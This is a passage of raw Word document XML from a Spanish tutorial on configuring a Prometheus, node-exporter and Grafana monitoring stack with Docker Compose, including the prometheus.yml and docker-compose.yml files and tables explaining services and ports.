            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49FC66FC" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C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Redes definidas para conectar servicios </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="6B3AC2FC" w14:textId="77777777" w:rsidTr="0063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0988B828" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>environment </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D0D8882" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C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CE">
              <w:t>Variables de entorno </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="779AD4D1" w14:textId="77777777" w:rsidTr="0063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48571CA1" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>depends_on </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50F239A8" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C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Dependencias entre servicios </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="260D5259" w14:textId="77777777" w:rsidTr="0063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09E3609F" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>command </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72FE6FA0" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C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4CE">
              <w:t>Comando a ejecutar al iniciar el contenedor </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006334CE" w:rsidRPr="006334CE" w14:paraId="5E9B2F9B" w14:textId="77777777" w:rsidTr="006334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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="681CF8AC" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
            </w:pPr>
            <w:r w:rsidRPr="006334CE">
              <w:t>restart </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4575" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A7CBE3E" w14:textId="77777777" w:rsidR="006334CE" w:rsidRPr="006334CE" w:rsidRDefault="006334CE" w:rsidP="00900B3C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4CE">
              <w:t>Política de reinicio (always, on-failure, etc.) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55136DFB" w14:textId="17E0CBBE" w:rsidR="005468D5" w:rsidRDefault="005468D5" w:rsidP="005468D5">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc203361921"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nuestros Docker Compose</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="613F5B71" w14:textId="5E0B6AE2" w:rsidR="00600509" w:rsidRDefault="006B76C6" w:rsidP="00600509">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc203361922"/>
      <w:r w:rsidRPr="00344E3E">
        <w:t>prometheus.</w:t>
      </w:r>
      <w:r w:rsidR="00600509" w:rsidRPr="00344E3E">
        <w:t>yml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="584F65CD" w14:textId="752E9BAD" w:rsidR="00600509" w:rsidRDefault="00600509" w:rsidP="00600509">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En base a la documentación oficial </w:t>
      </w:r>
      <w:r w:rsidR="00344E3E">
        <w:t>disponible en:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F35A0F" w14:textId="7DD5586D" w:rsidR="00344E3E" w:rsidRPr="00344E3E" w:rsidRDefault="003F5143" w:rsidP="00344E3E">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://prometheus.io/docs/prometheus/latest/configuration/configuration/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B27ECA4" w14:textId="7F4801F0" w:rsidR="00344E3E" w:rsidRPr="00117D9D" w:rsidRDefault="00344E3E" w:rsidP="00600509">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00117D9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hacemos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDC4EBA" w14:textId="77777777" w:rsidR="00600509" w:rsidRPr="00117D9D" w:rsidRDefault="00600509" w:rsidP="00047FA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41D3A84" w14:textId="61530AA0" w:rsidR="00047FA0" w:rsidRPr="00117D9D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117D9D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>global:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505AD941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117D9D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00047FA0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scrape_interval: 15s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D83C1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0C46797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047FA0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scrape_configs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C6FBF2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047FA0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  - job_name: 'node'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC68EE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047FA0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    static_configs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0412292A" w14:textId="77777777" w:rsidR="00047FA0" w:rsidRPr="0006633C" w:rsidRDefault="00047FA0" w:rsidP="00047FA0">
      <w:pPr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06633C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      - targets: ['node-exporter:9100']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C1D44C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1FA4F9B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047FA0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  - job_name: 'php-service'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACCF202" w14:textId="77777777" w:rsidR="00047FA0" w:rsidRPr="00047FA0" w:rsidRDefault="00047FA0" w:rsidP="00047FA0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00047FA0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    static_configs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781426EA" w14:textId="136D0495" w:rsidR="006B76C6" w:rsidRPr="006374E5" w:rsidRDefault="00047FA0" w:rsidP="00047FA0">
      <w:pPr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6374E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      - targets: ['host.docker.internal:8080']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7FECCD" w14:textId="77777777" w:rsidR="0006633C" w:rsidRDefault="0006633C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686ABF01" w14:textId="2088CB8F" w:rsidR="0006633C" w:rsidRDefault="0006633C">
      <w:r w:rsidRPr="0006633C">
        <w:t>Tenemos dos “exporters” para P</w:t>
      </w:r>
      <w:r>
        <w:t>rometheus</w:t>
      </w:r>
      <w:r w:rsidR="0006192F">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0006192F">
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n este caso </w:t>
      </w:r>
      <w:r w:rsidR="0006192F">
        <w:t>se apunta a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24699E36" w14:textId="77777777" w:rsidR="00211A7F" w:rsidRDefault="00211A7F" w:rsidP="00A00A17">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:r w:rsidRPr="00211A7F">
        <w:t>Un servicio PHP expuesto localmente en el host a través de host.docker.internal y que como sabemos usa el puerto 8080 de nuestra máquina física (lo usaremos cuando Prometheus está dentro de Docker y quiere acceder al host). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EE4FA2" w14:textId="3809C226" w:rsidR="00DC58AC" w:rsidRDefault="0006192F" w:rsidP="00A00A17">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:ind w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:t>'node-exporter:9100': servicio que expone métricas</w:t>
      </w:r>
      <w:r w:rsidR="00D83246">
        <w:t xml:space="preserve"> comunes como CPU, RAM, disco. Se trata de una herramienta oficial de Promtheus que expone métricas del sistema operativo en el endpoint HTTP :9100/metrics</w:t>
      </w:r>
      <w:r w:rsidR="00DC58AC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F2216">
        <w:t xml:space="preserve"> Est servicio se expone en el YML principal objeto del comando Docker compose up</w:t>
      </w:r>
      <w:r w:rsidR="009841AF">
        <w:t>. Como podremos ver en el siguiente apartado es el primer servicio que se define que se descarga de la imagen oficial prom/node-exporter</w:t>
      </w:r>
      <w:r w:rsidR="007C5C26">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="007C5C26" w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://hub.docker.com/r/prom/node-exporter</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1949FC34" w14:textId="5A40175D" w:rsidR="007C5C26" w:rsidRDefault="007E3058" w:rsidP="00F81834">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007E3058">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CD2376" wp14:editId="095D195F">
            <wp:extent cx="3710763" cy="2345055"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="58085456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54568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4"/>
                    <a:srcRect r="3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3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2194" w14:textId="77777777" w:rsidR="006F2216" w:rsidRDefault="006F2216" w:rsidP="006F2216">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18DA93A4" w14:textId="25AC8E28" w:rsidR="006F2216" w:rsidRPr="00117D9D" w:rsidRDefault="006F2216" w:rsidP="006F2216">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc203361923"/>
      <w:r w:rsidRPr="00117D9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>docker-</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2216">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>compose</w:t>
      </w:r>
      <w:r w:rsidRPr="00117D9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.yml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="2553F1E1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>version: '3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20730F25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>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458D9D9A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node-exporter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E3EACB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image: prom/node-exporter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B36363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container_name: node-exporter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF8872E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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B66F516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  - 9100:9100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D50CC2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57380F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prometheus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340E592A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image: prom/prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F5F33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container_name: prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2273F12F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volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F860C1" w14:textId="77777777" w:rsidR="009841AF" w:rsidRPr="009841AF" w:rsidRDefault="009841AF" w:rsidP="009841AF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009841AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./prometheus.yml:/etc/prometheus/prometheus.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A4AD4B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9841AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00117D9D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639906A3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  - 9090:9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A086BE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</w:p>
    <w:p w14:paraId="295DCD3D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grafana:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E976911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image: grafana/grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A6703A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container_name: grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492C485C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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E0C724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  - 3000:3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44448220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volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340DB7F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    - grafana-storage:/var/lib/grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3150C2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</w:p>
    <w:p w14:paraId="10F3F01B" w14:textId="77777777" w:rsidR="009841AF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>volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243053E8" w14:textId="794EF62D" w:rsidR="006F2216" w:rsidRPr="00117D9D" w:rsidRDefault="009841AF" w:rsidP="009841AF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00117D9D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  grafana-storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E318A78" w14:textId="3005FB17" w:rsidR="000B1711" w:rsidRDefault="000B1711" w:rsidP="00DC58AC">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397A7AD4" w14:textId="3D9F739A" w:rsidR="007E3058" w:rsidRDefault="007E3058" w:rsidP="00DC58AC">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Además del </w:t>
      </w:r>
      <w:r w:rsidR="00F81834">
        <w:t>mencionado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> node-exporter tenemos l</w:t>
      </w:r>
      <w:r w:rsidR="00642011">
        <w:t>os siguientes servicios.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula4-nfasis1"/>
        <w:tblW w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2852"/>
        <w:gridCol w:w="2844"/>
        <w:gridCol w:w="2798"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F81834" w:rsidRPr="00F81834" w14:paraId="68AF3276" w14:textId="77777777" w:rsidTr="00F8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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A92D8B0" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F81834">
              <w:t>Servicio </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E8FBEA9" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834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34">
              <w:t>Propósito </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B925AB8" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834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34">
              <w:t>Puerto </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F81834" w:rsidRPr="00F81834" w14:paraId="7B2F2E2F" w14:textId="77777777" w:rsidTr="00F8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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="242FCF2E" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F81834">
              <w:t>node-exporter </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="592BEA48" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834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834">
              <w:t>Exponer métricas del sistema (CPU, RAM) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04C7AC71" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834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834">
              <w:t>9100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F81834" w:rsidRPr="00F81834" w14:paraId="3B0AC9ED" w14:textId="77777777" w:rsidTr="00F818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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C0BB7AF" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F81834">
              <w:t>prometheus </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4892A318" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834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834">
              <w:t>Recoger y almacenar métricas </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C87A67C" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834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834">
              <w:t>9090 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F81834" w:rsidRPr="00F81834" w14:paraId="7D4A3B60" w14:textId="77777777" w:rsidTr="00F81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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F14BA3" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834">
            <w:pPr>
              <w:pStyle w:val="Texto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F81834">
              <w:t>grafana </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EEF6B14" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834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834">
              <w:t>Visualizar métricas con dashboards </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3030" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71EBC750" w14:textId="77777777" w:rsidR="00F81834" w:rsidRPr="00F81834" w:rsidRDefault="00F81834" w:rsidP="00F81834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834">
              <w:t>3000 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AF2C81D" w14:textId="77777777" w:rsidR="00642011" w:rsidRDefault="00642011" w:rsidP="00DC58AC">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A63B036" w14:textId="071FC7D6" w:rsidR="002616B4" w:rsidRDefault="002616B4" w:rsidP="00DC58AC">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Comentar los siguientes aspectos respecto del </w:t>
      </w:r>
      <w:r w:rsidRPr="002616B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> creado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A29A15B" w14:textId="77777777" w:rsidR="004B75FB" w:rsidRDefault="00EC491D" w:rsidP="00BD62C2">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Es clave siguiendo la documentación ofici</w:t>
      </w:r>
      <w:r w:rsidR="003B3FB4">
        <w:t>al en</w:t>
      </w:r>
      <w:r w:rsidR="004B75FB">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003B3FB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00BD62C2" w:rsidRPr="00A535F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://prometheus.io/docs/prometheus/latest/installation/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BD62C2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FBB10" w14:textId="73D428CD" w:rsidR="00EC491D" w:rsidRDefault="00BD62C2" w:rsidP="004B75FB">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>conocer co</w:t>
      </w:r>
      <w:r w:rsidR="004B75FB">
        <w:t>mo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> establecer el fichero de configuración de Prometheus definido anteriormente como un volumen del servicio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E446B7D" w14:textId="5626097F" w:rsidR="000B28B6" w:rsidRPr="000713FD" w:rsidRDefault="000B28B6" w:rsidP="000713FD">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000713FD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">El bloque del servicio Grafana </w:t>
      </w:r>
      <w:r w:rsidR="005651A1" w:rsidRPr="000713FD">
        <w:t xml:space="preserve">también mapea volúmenes en concreto a graga-storage que está definido para el host como un espacio que gestionará Docker </w:t>
      </w:r>
      <w:r w:rsidR="000525CE" w:rsidRPr="000713FD">
        <w:t>automáticamente</w:t>
      </w:r>
      <w:r w:rsidR="000713FD" w:rsidRPr="000713FD">
        <w:t xml:space="preserve"> y por tanto no visible directamente ne Windows. Aquí se guardará toda la información persistente necesaria.</w:t>
      </w:r>
      <w:r w:rsidRPr="000713FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29074867" w14:textId="7644CB76" w:rsidR="002616B4" w:rsidRDefault="00344E3E" w:rsidP="00344E3E">
      <w:pPr>
        <w:pStyle w:val="Texto"/>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00344E3E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
